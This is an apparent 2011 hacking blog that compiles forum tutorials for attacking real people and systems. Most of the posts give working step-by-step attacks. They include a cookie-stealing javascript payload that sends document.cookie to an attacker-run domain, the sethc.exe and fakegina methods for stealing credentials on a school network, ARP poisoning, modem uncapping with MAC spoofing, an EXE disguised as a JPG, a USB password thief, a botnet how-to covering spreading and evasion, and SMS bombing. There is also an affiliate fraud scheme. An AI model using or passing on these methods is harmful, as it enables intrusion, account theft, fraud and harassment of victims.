Saturday, April 23, 2011

How to get People's Ip address through MSN (Windows Live Messenger)

ey guys long ago they released a script that grabs the ip while talking to the person and shows you it in a control panel and i think they removed it from the site but i still had it on my desktop and would like to share it
with others.

Click Here For Download - IpGet -

you have to be logged in Msn to run the script

You need Windows Live messenger + Messenger plus features.

Once opened it shows this.


Once the script is imported go to your scripts and go to Ip Connections



So this will pop up and then go open a conversation with your slave send him a notepad doesn't need to be a notepad it could be anything and just cancel it fast and like say oops wrong person and it will show his ip in ( New Connections )



After i send something to someone and got their ip.
http://img132.imageshack.us/i/msn6.png/

This tutorial is a way to get ip's for good reasons only if used for any other reasons that gets you in trouble, i am not responsible.
(ALL.RI.RE)

Virus Scan:
http://vscan.novirusthanks.org/analysis/...wLXBsc2M=/

VirusTotal:
http://www.virustotal.com/file-scan/repo...1301433759

Hacking Cable Modems for Higher Speeds and Free Internet

Local office - has the uplink; connected to the nodes
Local node - a router connected to the community hubs; you have to use a MAC address from another node or you won't be able to get online
Community hub - These are the little green boxes that serve your house; these are connected to bigger and bigger hubs until it's connected to the node.Each node serves several hundred people. When you go on the network, you get automatically assigned an IP address. It checks your MAC, and if it's not registered it tells your computer to use a private DNS server that gives you a "Buy our service" page when you try to go anywhere. But you can just use a different DNS server. If it is registered, you can get access immediately (you borrow someone's MAC from another node); alternatively, you can set your modem to force network access.

This is an estimate of the cable TV network. This is backed by the fact that users have been using uncapped, unregistered modems for years and have not been caught. Cable companies can pinpoint your location down to the neighborhood level. Anyone who says otherwise is ill-informed.

Resources:
Spoiler (Click to View)
http://theoryshare.com/
http://tcniso.net/

Hardware Required
To successfully obtain free, uncapped internet, you need to have a modem which has been hacked:
Motorola SB3100
Motorola SB4100
Motorola SB4200
Motorola SB5100
AMBIT 120
AMBIT 200
AMBIT 250
RCA 245
WebSTAR DPC2100

However, for tutorials on most these you will need to look elsewhere. This tutorial will focus on the SB5100, as it is the easiest to modify (although the SB4100 and SB4200 may also be modified by this method).

You can pick up these modems on eBay. Alternatively, you can buy a pre-modified modem at TCNiSO or Theoryshare. I recommend TCNiSO, as Theoryshare uses illegal copies of the BlackCat software that TCNiSO made.

You will also need a JTAG cable, which you can make yourself (you'll need a 10-pin header, and a ribbon cable that will connect to it, as well as a parallel port plug you can solder the ribbon cable to, as well as a solder iron) or you can buy it from TCNiSO or Theoryshare (again, TCNiSO is recommended). Besides being official, it's better made. The TCNiSO cable will include an OFFICIAL license for the BlackCat software.

Software
You'll need BlackCat from TCNiSO.
Download:
Spoiler (Click to View)
http://www.megaupload.com/?d=R5U6YG8I

Guide

Step 1: Solder the header
[Image: oafjkaabf.jpg]

Kind of blurry, but easy to follow. Grab your 10-pin header (get from radioshack or desolder from an old electronics board). It'll have a black plastic piece with 10 pins sticking out of it. One side will have more pin sticking out than the other; looking from the top of the cable modem, place the short end through the holes. Use some electrical tape and tape it tightly to the board. Torn it over, and solder the pins to the board. Make sure that the solder doesn't touch any other electronics or pins. Make sure that you don't heat any pin long enough to melt the plastic shroud; this will set you back a bit, as you will have to melt the shroud and push the pin back in place.

Take note of the pin hole that has the square.

Step 2: Making the Cable
[Image: oafjgaabf.jpg]

Very simple image, easy to follow. You'll need a DB-25 connector, with access to the pins on the back (so you can't just rip apart a printer cable; go buy a proper one at Radioshack). Picture has a bunch of circles and one square. See this to find out what it will look like on your board. Please note that this is a view of the FRONT of the connector (so everything is flipped around when you solder to the back).

I would recommend getting as long a ribbon cable as possible.

Step 3: Install Blackcat Software
I don't think I need any pictures or special instructions. There's a download link above. Install it.

Step 4: Connect cable to modem
Make sure you connect the cable the right way. Also make sure you connect the power cord to the modem and wall.

Step 5: Connect cable to PC
Plug the cable into the parallel port. Recommend setting it to ECP+EPP in your BIOS.

Step 6: Start Blackcat software
[Image: pafjfaabf.jpg]

When you start BlackCat, if everything is working properly and you didn't screw up the cable, your screen should look something like this. It's very important that it reports the manufacturer and part, and that it connected to the flash. If not, nothing will work.

Step 7: Detect flash
) Click on the 'Flash' tab, click 'Detect'. Check confirmation that the flash is detected.

"Detected a MXIC MX29LV160AB flash ic"

Step 8: Backup your entire flash
On the flash tab, click Read All and save the file somewhere. THIS IS A COMPLETE BACKUP OF YOUR MODEM. If anything goes wrong, you'll need this to restore it. It will take about 10 minutes. Make sure the box on the right (under Size) says 0x00.

Step 9: Bootloader
Go to the SB5100 tab. Under "Install new bootloader", click the folder and open up "SIGMAX-BL_v2.6-LITE.bin" (look in the software download link above). Then click flash. (if you get a Device not connected error, restart. If you still get it, you messed the cable up, or your parallel port isn't configured properly)

Step 10: Firmware
On the SB5100 tab, click "Check" at the bottom. Then click Program. It should ask you to find a file. Download this file: http://rapidshare.com/files/30844399/SB5...d.13.5.zip unzip it and use the .bin inside there (it's the bin other than the bootloader).

Step 11: Reboot Modem
Disconnect the cable from the modem. Remove the power cord. Connect your computer to the modem with an ethernet cable. Plug the power back in.

Step 12: Online configuration
Set your IP address to 192.168.100.2 (gateway 192.168.100.1, mask 255.255.255.0).
Enter "http://192.168.100.1:1337" into your browser. If you see a Sigma page, you did good. Change the last few digits of the MAC and Serial (keep the serial numbers only, and keep the MAC 0-9/A-F) so you don't get caught. Turn on baseline privacy and stealth mode, and forced network access. Turn off all the others.

You also need to change the conig file. Check the forums at theoryshare.com or tcniso.net to see what config file you'll need to change it to.

Step 13: Change IP
Change your IP to automatic. It should pull a new IP from the modem, and you should now have internet access.

How to change an EXE file to JPG

Well let's change exe to jpg file in a minute, I will also teach a bit of social engineering:

This is used in windows7 in other systems do not know, maybe given ...

*We take the exe file that we will change.

*and open the character map, if you know where you are, easy to give a look

*Now we are going to change the extension to the file, delete exe and replace it with (com)

*Now let's change the extension to JPG, open the Character Map and select the font ARIAL.

*Now choose U +202 E, we give to select and copy

*Now go to the file that had changed the extension to "COM" and type a single space.

---------photos .com------------

*Now is when it comes a bit of social engineering, for example we write a word that makes the file is trustworthy, such as "Playboy"

---------photosplayboy .com------------

*Now paste the character you have copied the map of characters and write "GPJ" FREE QUOTES.

---------photosplayboycom.jpg------------

*And we finished, we have introduced the character he does is to reverse the simple words if, as you can see we have camouflaged exe file like a JPG, and also have used social engineering to make our file to be fully trusted, and we can only change the icon and order.

Sunday, April 17, 2011

FIXED Hacking any computer in LAN and get all his logins [TUT]

What we need
1. Backtrack 4 (i recommend it but not compulsory)
2.If you donot have backtrack then you can download and run ettercap from google ..
3. Common sense

Lets start

Question comes whats ettercap ?

Ettercap is a suite for man in the middle attacks on LAN.,DNS spoofing etc..

What we are gonna do ?
We are going to perform man in the middle attacks using a basic method called arp poisoning..

Now if you donot know what is arp poisioning then i suggest you google it :) before moving forward


So now we know what the hell is arp poisoning now we gonna see what actually happens when we do arp poisoning
What actually happens.. ?

Before ARP poisoning



After poisoning




Now the Method USING BACKTRACK 4 :

First open Ettercap in graphical mode using :
In konsole
# ettercap -G


Uploaded with ImageShack.us
Select the sniff mode to sniff all the host connected on a LAN

Sniff → Unified sniffing


and
Scan for host inside your network using
Hosts → Scan

After scan is complete we go and check the host list we got.


Now we see the MAC and IP addresses of the hosts inside the window
( Hosts → Hosts List)

These are the machines which are connected in a LAN .
From this list we need to select the machines we need to poison.

Now we choose to ARP poison the machine 192.168.1.2 (in my case) ..you can use other machines from your host list whom you want to poison and remember that the IP of the router will always be 192.168.1.1.

Next
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
(It means this entry will be poisoned in the slave’s arp table so that all that slave uses on internet will first go through us.)

Highlight the line containing 192.168.1.2(in my case) it’s the victims IP address and click on the "target 2" button.


To start the ARP poisoning:
Go to

Mitm → Arp poisoning


and start the sniffer to see the activities and its done ! whatever address slave will visit you will be able to see it :)

Method using Windows :
Download ettercap for windows and rest of the steps are same :)Oui

Note : ettercap in BT is not in GUI mode you may need to install GUI mode if you don't know how to use non GUI one

Use "apt -get install ettercap-gtk" Victoire

eBook Basic Hacking You MUST know

f Youre Going to Download, please reply to this thread, and say a simple Thank You!
Hey guys, I just joined the forum and I'm trying to make a good first impression on such a huge forum, so I decided to share one of my oldest eBooks

Where Did I get it from?

To be honest with you, I don't even recall the original source of this eBook, but I do know it is a very good and basic one.

What does it cover?
-Where to start
-Needed Programming
-Linux and how to use it
-Password Cracking and Hacking
-Network Hacking [footprinting, etc...]
-Wireless Hacking
-Windows Hacking
-Malware
-Web Hacking

How do we know this is not infected?
Well as I said before, all I am trying to do here is help some members and give a good first impression on here, so if you are not confident enough, don't download it, or just run it sandboxed or something to make sure. To be safe, read the .pdf on Linux if you want!

Download

How To Hack Your School Network [WORKS]

So, a lot of people here should want to hack his school's network.
It can be really easy, and it can be quite difficult if your scholl have actives network administrators.

Anyway, you can do it following my tutorial, there are a lot of possibilities but I will explain the most efficients methods here...

So, Let's started !

#### Gain local admin privileges ####


It's very easy to gain admin privileges.

1st method :

(cmd not blocked)

How to open CMD?

-Press Windows+R ==> type "cmd.exe" in the box
or
-create a new text file, just write it inside :
Code:
@echo off
command
pause
and save it as "something.bat"
just click on it.

In cmd, type :

Code:
net user *nameyouwantfortheaccounthere* /add

(dont write the stars)
and now type :

Code:
net localgroup Administrators *nameoftheaccount* /add

note :
For non-english computers, the group "Administrators" could not be the same, on french computers, it's called "Administrateurs", so for check what is the name of the group, just type "net localgroup" for see the list of groups on the computer

Now you can connect yourself on the local machine with an admin account

2nd method :


Just burn ophcrack on a dvd
ophcrack can be found here :
http://ophcrack.sourceforge.net/download...ype=livecd

If the BIOS of the computer is password-protected, go here and look for the software solution

Now boot the computer, and when you got the motherboard message, press a key for enter in the BIOS or in the boot-order menu (the key you have to press is different on a lot of motherboards, but it's generally DEL or F2, it's will be displayed on the screen)

Change the boot order and move the DVD to the first position.

Now normally boot the computer and ophcrack will started, in 95% of case, it will find the admin password of the computer.
If not, go to the 3rd method

3rd method :


Ophcrack didn't find the admin password? It's not a problem Roflmao

Just boot on a linux live CD (i highly suggest Backtrack 4 for the following of the tutorial)
the live CD can be found HERE

Just start on the CD, and wait for the command prompt appears
now type in :
Code:
fdisk -l
and search for the windows partition, basicaly the biggest
We will say that the partition is called "dev/sda2" (It can be different on your computer!!!)
now type :
Code:
mkdir /mnt/xp
mount /dev/sda2 /mnt/xp
cd /mnt/xp

Now you are in the root of your windows partition, without any restrictions
just type :
Code:
cd WINDOWS/system32
and remove sethc.exe
Code:
rm sethc.exe
and copy cmd.exe with the name "sethc.exe"
Code:
cp cmd.exe sethc.exe

and you're done.
Just reboot the computer and on the winlogon screen, just hit SHIFT key five times and the cmd prompt will appears.
Now just follow the 1st method and you can access to an admin account.

#### Gain Network Admin Privileges ####


Ok this must be the hardest part, but you can do it Roflmao

So you need to know how is built your school network,it's not a problem, just go, with local admin account, to start>network or go to the control pannel and look at all the computers in the network.
You'll certainly find a lot of computers, search for a computer called "server" or with a name different to others
In my school, the server is called "server1"
try to click on it, it will certainly ask you for username and pass, you can give the pass of your limited account, and you'll certainly access only to the "normal" files that you can acces in normal time when you connect to the network.
So, you need admin passwords, you can succesfuly do it easily Roflmao

1st method :


If you can access to a computer that is used by admins or teachers, just unistall the AV on the computer (easily done in control panel) and install this great tool, fakegina Biggrin
downloadable here

Just move fakegina.dll into C:\WINDOWS\system32
and now press windows + R
type in : "regedit"

go to : "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
and create "GinaDLL" in "REG_SZ" with value "fakegina.dll"

OK you're done, just wait for someone connect to the computer, and the usernames and passwords of the users will be stored in "C:\WINDOWS\system32\passlist.txt"
wait for an admin connect to the machine, and voila, you got his pass.

passlist exemple :
Spoiler (Click to View)
[Image: 20533773997242_fakegina.jpg]
in the format domainname\username password

2nd method :


No privilegiated users are connecting on the computer, it's not a problem, just intercept the packets send by the users to connect to the server.

Just download and install Cain & Abel
Now just google for ARP Poisonning and snif SMB packets, it contains the login informations of the user connecting, just decrypt it with cain and you're done.
You just have to wait an admin to connect on the network

3rd method :


Ok it's not really a skilled method, but it works well.
Just try to watch an admin or a teacher connecting to the network, try to see what is the password typed.
If it's only numbers, it can be a birthday date or something else
Social Engineering is also a good way to go.

#### Gain Full Access To The Main Server ####


Okay, once you've got an admin password, you'll want to have a fully access to the main server.

1st method :


Normally, the administrators are using remote desktop for having access to the main server.
Just try to connect to it : Start > accesories > remote desktop connection
And then,type in the box the name of the main server, in my school, it's "server1"
If you got access to an windows login screen, it's good!
Just try type the admin username and pass.
If it works, you're done, welcome to the main server of your school, you can do what you want Biggrin


2nd method :


If it doesn't work, the server only got one account that can access to the server interactivly, generaly called "administrator"
So just try to find the password, maybe the same as the admin user.
if you don't find the password, use Cain & Abel and snif for RDP packets.
This packets are used when someone use the remote desktop for connect to the server, and they contains the username and the pass of the admin user that can access to the main server with remote desktop.

If you successfuly find packets, great, just open it and search for the password
And when you got it, just connect to the main server, and you're done Roflmao

3rd method :


If you don't find any packet while sniffing, you can pentest the server.

Just use a backtrack live CD, use metasploit and autopwn the server (there are a lot of tutorials on hackforums and all over the internet), there are a lot of chances that the server isn't updated, so enjoy and try to find any vulns to the server

If metasploit succesfully find a vuln, you're done, and you'll access to a shell, ENJOY

#### What To Do With The Main Server ####


A lot of things...
But the first thing to do is to dump the hash of the server, google for fgdump and use it to dump the hashes of the server.
Now crack them with Ophcrack and you'll gain the password of all the accounts of your school, enjoy

Now you got all the powers, I recommend you to not do "funny" things and don't let any tracks, don't touch at the accounts, just access to the teacher's files (some of them store theirs test in their account folder) just enjoy and increase your grades Roflmao

Do it silently and all will be fine
tested and approuved by me..

Easy $150+ daily - My own method [ Adult ]

Today I'll show you how you can earn some easy money.

(Please use my reflinks,I'm giving this for free)

1. STEP (Registrations)
- Register account at xProfiles.com as affiliate
- Register account at xProfiles.com as member with fake name and upload some girl pictures (fully or half naked)
- Register on PornHub.com with same member name from xProfile and upload 2-3 pictures

2. STEP (Accept friends on PornHub)
- You will get a lot of friendship requests from horny guys :D , accept them all
- Write something on your blog to show them that you are interested
- When you get more than 50 friends you can go on next step

3. STEP (Your aff link)
- Write "Why this site don't have a chat :( , do you want to chat with me on xProfiles" on your PornHub blog
- Find your affiliate link in xProfiles promo tools,short it with non known shortening service and write on your blog "my xprofiles profile YOURAFFLINK , add me as friend if you want to chat with me"

4. STEP
- Watch how money is coming in your aff account on xProfiles

For every free signup you will get $1.50 but it's not all,if your PornHub friend want to find you on xProfiles he must upgrade his account and you will earn additional $10 :D

HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)

I am gonna tell you how to hack any yahoo account by stealing cookies or we can say stealing session IDs.

First of all I want to tell you the basics of the cookies.

What are session cookies or session IDs?
Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don’t get asked for the same information you’ve already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on ‘Sign Out’ option.

Just visit yahoo.com. Type in browser
Code:
javascript:alert(document.cookie);

You would get a pop up box showing you the cookies left by yahoo on our PC.

Now login to your account and do same thing, you would see some more elements added to the cookies. These represent sessions ids.

So it means sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave’s account without providing any username/password. This attack is very uncommon because when the slave clicks ‘Sign out’, session gets destroyed and attacker too also gets signed out.

But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks ‘Sign out’. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Download the required script from here:
Cookie Stealer Script

Steps for stealing session cookies:

1. Sign Up for an account at any free web hosting site.
I have chosen my3gb.com.

2. Now login to your account and go to file manager.

3. Now upload the four files that you have just downloaded. And also make a new directory named ‘cookies’ here.

4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account.
Code:
javascript:document.location=’http://yourdomain.com/yahoo.php?ex=’.concat(escape(document.cookie));

Quote:Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory ‘cookies’

When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php

And enter the password (Default password is CR@5H n BURN)

Now you must have got the username of slave’s account. Simply Click on it and it would take you to inbox of slave’s yahoo account without asking for any password.
Now it doesn’t matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

HOW To hack facebook

So i’ve decided to “RELEASE” How i actually got into the facebook account…
Now alot of you think it was hard … Well it was only hard at the brute force , That’s what did most of the work, But i was required to do some work of my own..
ca
Yahoo is a good source of information and tools, Although they do not know that the tools they let people use can be used to hack others.. But yes.. Read the instructions and you will see how to exploit yahoo…

Ok, So to start you will need the following..

1, Yahoo account
2, Brute Force ( with built in proxy or Captcha solver ) = Face book captcha to stop multiple password tries.
3, Facebook account
4, The facebook you want to hack on your facebook friends list.

_

Step’s

Step one: Goto facebook and logout

Step two: Goto Yahoo

Step Two.One: Login to yahoo, ( Pretty obvious step.. )

Step Three: Goto *Mail* ( Its on the left hand side of the main page )

Step Four: Look in the middle of the page you will see
* IMPORT CONTACTS *

Step Five: Click IMPORT CONTACTS

Step Six: You will see 4-5 Options, Click Facebook

Step Seven: It will now have loaded a new window ( Turn popup blocker off )

Step Eight: Login to facebook, The page will shrink down and the yahoo page will start to update.

Step Nine: as you will see the yahoo will say *Importing contacts *

Step Ten: Once it has imported all the contacts
( If you made a fresh facebook / yahoo account it’s pretty easy to sift through them.

But If you only have the one person on your facebook, It will be the only one it add’s to the yahoo contacts.

Step Ten.One: Click * Download Contacts * <- YOU MUST DO THIS To get the email )

Step Eleven: Once Downloaded open with Microsoft Excel ( Recommended due to its easier to find the email part )

Step Twelve: Once you have found the email load your brute force..

Step Thirteen: Wait for the brute force to do its work..

Step Fifteen: Done..

HACK EMAIL ACCOUNT AND FACEBOOK PASSWORD USING USBthief

1. Free Download USB Thief to hack slave passwords.

2. Unzip the file. Connect USB drive to your computer. Format it.

3. In downloaded file, go to: “USB Thief Modified” -> “Copy” folder and copy all the files in that folder. Paste all the files in USB drive.

4. Now, in USB drive, hit on “hideh.bat” file which makes all the files in USB drive hidden. Delete “hideh.bat” file.

5. Move on to slave computer and plug in the USB. Open the USB drive on slave computer and wait for 8-10 seconds. Safely remove the USB from slave computer. All the slave passwords are thus, now captured in our USB drive.

6. Now, to see these passwords, copy “showh.bat” file from the downloaded files. Paste this file in your USB drive and run it in USB. Now refresh. You will be able to see all the hidden files.

7. Open “IMNeoWorld” folder which will contain all hacked passwords and license keys.

download usb thief from here

Bypassing School blocked websites

Its very simple. At my school many sites are blocked for some reason :(

But theres a way to unblock it, you can do this to almost every website.

All you have to do its type “https://” in front of the website. Yes you include the S.

I use this to get on Facebook, Meebo ( AIM ) , Hackforums , etc.

Hope this helps you guys, enjoy! Smile

The Difference Between a DoS and a DDoS Attack

Okay- Here is a little rant that is probably going to turn into some basic information…

I am getting sick and tired of people making this mistake- I suppose I could understand because the difference in names is so small; but the difference in meanings is huge as far as Data flooding goes, aDoS (Denial of Service) is NOT a DDoS (Distributed Denial of Service)…There IS a Difference, Let me Define both of them:

DoS: a DoS Attack is a Denial of Service attack- it involves using one computer / Internet connection to flood a server with packets (TCP / UDP) – The Objective of this attack is to ‘overload’ the servers bandwidth / other resources, This will cause a Denial of Service to anyone else that tries to use the server for whatever reason (HTTP [Website]).etc – hence the name Denial of Service Attack.

DDoS: Yes, There IS a difference- a DDoS Attack (or Distributed Denial of Service Attack) is pretty much the same as a DoS- but the difference in results is massive; as its name suggests the DDoS attack is executed using a distributed computing method often referred to as a ‘botnet army’, the creation process of which involves infecting computers with a form of malware that gives the botnet owner access to the computer somewhat- this cold be anything from simply using the computers connection to flood to total control of the computer – these attacks affect the victims computer -> server more than a regular DoS- because multiple connections are being used against ONE connection, Think of it like a fight, if there is a 1-on-1 fight; the chance of the good guy winning is far higher than if he was being beaten up by severalthousand tough-guys :)

Anyway- I hope this clears things up a bit :)

What is Botnet Question & anwer ..every thing you want to know

Q: What’s a bot?
A: A bot is a malicious program which has several purposes.
They are usually told what to do by a botnet admin although many of the features now are automated.

Q: What’s a botnet?
A: A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.

Q: What can a bot do?
A: Usual features of a bot include…

* P2P Spreading (Limewire, uTorrent, etc.)
* IM Spreading (Sends to contacts on MSN, AIM, etc.)
* DDoS attacking (See “what’s a DDoS attack?”)
* Spam mailing to lists of emails (Often used to spread)
* Collecting personal information (Passwords, bank details and the like)

Q: How are bots told what to do?
A: Bots are usually commanded through an IRC channel by the user. Commands are built in and the bots listen for them.

Q: What’s an IRC channel?
A: IRC stands for Internet Relay Chat. It’s like a group messaging thing although you can also speak to people privately. To use IRC you need a client like ChatZilla, XChat or mIRC. You then connect to an IRC server and choose the channel you wish to join.

Q: How do I get a botnet?
A: First you will need a source code and the programs required to compile it. Most bots are programmed in C++, but you don’t need any programming experience to compile your own. There is usually one file named “Configs.h” or something similar that you have to edit, that’s where you edit the bot names, the IRC channel and any other necessary information. Look for bot sources in the botnet section here and they’ll usually come with some form of instructions.

Q: Which bot should I use?
A: I recommend IMBot v4.1, it’s pretty simple to compile and use, I’m sure there are tutorials here for it as well.
You can download IMBot here. (Clean download, it’s mine).

Q: Is this illegal?
A: Yes. Mass-spreading a bot illegally and stealing information can get you into real trouble if you’re caught. 99% of the botnets that are shut down have over 10,000 bots, though, and I wouldn’t expect anyone here to reach over 5,000. You will have to make sure your IRC server is secure and that your bot stays undetected.

Q: Is it true I can make money from this?
A: Yes, potentially. You could make the bots visit referral sites or download files. A lot of people sell the accounts they’ve taken from their bots for a price cheaper than the original. You don’t have to do any of this, but as your botnet grows you will need more money to transfer to a professional IRC host.

Q: How can I secure/hide my botnet?
A: Offshore hosting first of all. Something in a country such as Sweden, for example. Dedicated hosting would be best, because that way you aren’t sharing your hosted server with anyone and you can hold a much larger network. A password on your IRC channel is also recommended. Be sure to use a bot that is undetected, whether you have to crypt it or not.

Q: What do most people use botnets for?
A: The majority of them are used for DDoS attacks against websites when there are a lot of them. Many people set up large botnets just to sell their bots, though. With the rate they spread at, you could sell a large amount of bots to someone for a nice profit with only a small amount of work done.

Q: How can I spread my bot?
A: Most bots are spread through torrenting websites or warez boards. A lot of bots also have auto-spread features, so you could have 50 bots and then gain 150 more through the auto-spreading without doing any work at all. A lot of people also buy bots off other botnet admins to start their botnet off with a nice amount.

Q: What type of bot would be best?
A: Java bots seem to be the most popular right now since a lot of them are still fully undetectable, but you have to bear in mind that your slave will need Java. The same with bots coded in VB.NET, your bots will need the .NET framework. Some VB6 bots may also need missing .ocx files, so in my opinion the best choice of bot would be one coded in C++ such as IMBot.

Q: How much should I pay for bot installs?
A: A good price would be 10 cents per bot, which works out at $10 for 100. Some botnet admins may charge you more, but I don’t think it’s worth paying much more than that. Another risk of buying from other botnet owners is that they still keep the bots to themselves as well, so be sure to find someone trustworthy. Bear in mind that some may not be able to remove their own.

Q: How do I configure my bot to connect to my IRC server?
A: Most bots come with some sort of instructions text file. There are also a lot of tutorials for different bots here at HF, just search the name of your bot. If you can’t find anything, there is usually a file named “config.h” (C++) or something similar. Open that and edit the parts that you’re supposed to, it should be clear which parts to change.
Example: //”server”,”pass”,6667,”channel”,”channelpass”,”-ix”; needs to be your info in that order.

Q: Is it easy to set everything up?
A: It is usually easy to configure and compile a bot, but setting up your IRC server, keeping it secure, paying for larger off-shore hosts, managing your bots and staying hidden are not easy tasks for beginners. Once you’ve done it all several times it will be easier though, as with anything. There are usually people here who would be able to help you out if you’re having any problems with your bots.

Q: Can I have a botnet without an IRC?
A: Yes. There are other great bots. Some can connect to PHP pages to read commands, some can be commanded over MSN and other clients, and some come with their own clients, e.g. DDoSeR. http://ddoser.info is a nice place to start if you’re not sure what you’re doing. It’s really simple to use and only $35.

Super Bluetooth Hack v 1.8 – New version released

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
“Call from his phone” it includes all call functions like hold etc.
+more!

SMS BOMBER [TUTORIAL]

!!WARNING!!
SMS SPAM IS ILLEGAL UNDER COMMUN LAW IN MOST JURISDICTIONS! I AM NOT RESPONSABLE FOR HOW YOU USE THIS INFORMATION!!

I found an easy way to send someone hundreds of sms texts. And I will now show you how to do it

This Tutorial will teach you how to SMS bomb for free. And without untrusted software.

Things you will need
1.Mozilla Firefox Browser.

2.iMacros Firefox Addon.
3.Free sms website with no login or captcha.
Send Free SMS
4.Internet Access

STEP1. Open Firefox and navigate to www.Send-Sms-Now.com

STEP2. Open up iMacros by pressing the F8 key.

STEP3. Look to the left of your Firefox browser and you will see iMacros.
On the bottom of the iMacros you will see 3 tabs PLAY | REC. | EDIT . Click on the REC. Tab you will see buttons that say RECORD, SAVE, LOAD, and STOP. Click the RECORD button.

STEP4. After you press the RECORD Button look back at the sms sending website you opened earlyer and you should see Country, Operator, Mobile Number, From, Message, and a Send Message button.
Fill out the information and click the send message button when you are done. The page should load and at the top it should say “Message Sent”.(If you dont see the Message Sent at the top of the page then start over because you did something wrong.

STEP5. Look back over to the left at iMacros and click the STOP Button.
Then click the Save button and you will get a window that opends up asking you what you want to save it as. Type what ever you want and click save and close.

STEP6. Now click the PLAY Tab on iMacros and look at the top of iMacros and search for the file you just saved.(The one from STEP5.)
Click the file and then look down and you should see a PLAY, PAUSE, & STOP Button. You will also see a couple of textboxes to enter the number of times you want to bomb the victum with text messages. Enter the number of texts you want to send were it says Repete Macro
Max: (I usualy put like 500 ). Then click the PLAY (LOOP) Button and kick back and let the sms bombing begin.

(IF YOU GET AN ERROR CLICK THE REC. TAB AND THEN CLICK THE CLICK MODE BUTTON AND YOU WILL GET A POPUP. MAKE SURE THE “SELECT THE BEST CLICK MODE AUTOMATICLY” OPTION IS CHECKED AND FOLLOW MY TUTORIAL AGAIN AND IT SHOULD WORK.)

This Seems Like A Lot Of Steps Just To SMS Bomb Somone But I Promise You After You Do This Once Or Twice You Should Have It Down Packed. It Is Safer Than Downloading Third Party Software That Could Be Infected With A Virus Or Just Doesn’t Work. This Should Work And Is Veary Easy and Quick After You Do It Once Or Twice.

I hope this tutorial will help some of you with sms bombing.
Please comment if this tutorial helped you out.

1000 + Hacking Tutorials .. Must have

Create Bootable XP SP integrated CD,Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Data Capacity of CDs [Tutorial].txt ,Debug, Learn how crack windows.txt,Delete An undeletable File.txt,Delete Files From The Recent File List In Windows.txt,Digital Camera Guide.txt
Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt 2.20 kB
Digital Photo Id Cards, Greate Info.txt 2.88 kB
Direct Link To Any Page You Want To In Hotmail.txt 1.95 kB
Directx Explained.txt 7.66 kB
Disable Compression On Xp, NTFS partition, Disk Cleanup.txt 0.43 kB
Disable The Send Error Report, to Microsoft.txt 0.51 kB
Disable Windows Logo Key.txt 0.62 kB
Discover New Music You’ll Probably Love.txt 1.08 kB
Download Free Music legally,, legally.txt 3.24 kB
Download from a paypal site without paying a penny!.txt 0.95 kB
Download From Ftpz, Using Ftp Search Sitez.txt 8.12 kB
Download Mp3′s Without Using Filesharing.txt 0.69 kB
Download Music And Video With ,edia Player9, quick and easy!.txt 0.66 kB
Download Timeframes.txt 0.33 kB
1.39 kB
Dual Boot After The Fact.txt 1.37 kB
Dvd Copying-ripping Definitions.txt 1.25 kB
DVD Regions Information.txt 3.84 kB
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt 0.94 kB
Easily Disconnect-reconnect From Broadband.txt 0.30 kB
Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt 1.40 kB
Ebay Hackcracktip.txt 0.50 kB
General Keyboard Shortcuts.txt 7.54 kB
Get In Windows 2000 As Administrator.txt 0.39 kB
Get the Most Out of Your DVD Recorder.txt 11.25 kB
Get The Music You Want To Hear.txt 0.90 kB
Get unlimited bandwidth from your host for free.txt 2.88 kB
Getting A 1gb Yahoo China Account.txt 0.98 kB
Getting Counter-strike Source To Work.txt 3.36 kB
getting movies, mp3,games using google.txt 0.75 kB
Getting older programs to run on Windows XP.txt 2.96 kB
Getting started with Linux for nOObs!.txt 17.37 kB
Go to Windows updates anonymously.txt 0.40 kB
Google Crack Search.txt 0.14 kB
Google secrets.txt 0.98 kB
Google Tips & Tricks, (utilizing search engine).txt 5.81 kB
Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt 2.45 kB
Guide For Getting Free Stuff.txt 10.33 kB
Guide to IIS Exploitation.txt 27.77 kB
Guide to Slipstreaming Service Pack 2.txt 2.82 kB
Hard drive Gone Bad.txt 5.55 kB
Hardware Firewall.txt 3.02 kB
How To Add An Option To Print, the Contents of a Folder!.txt 1.47 kB
How To Add Your Own Windows Tips.txt 0.48 kB
How to Back Up the Registry.txt 0.76 kB
How To Backup Ps2 Games.txt 7.71 kB
HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt 1.51 kB
How To Block Websties Without Software, block websites.txt 0.64 kB
How To Boot Xp Faster (updated).txt 1.66 kB
How to build a black box.txt 7.79 kB
how to burn quicker in windows xp.txt 0.28 kB
How to Bypass BIOS Passwords.txt 9.05 kB
How To Bypass Web Filters, tutorial.txt 6.20 kB
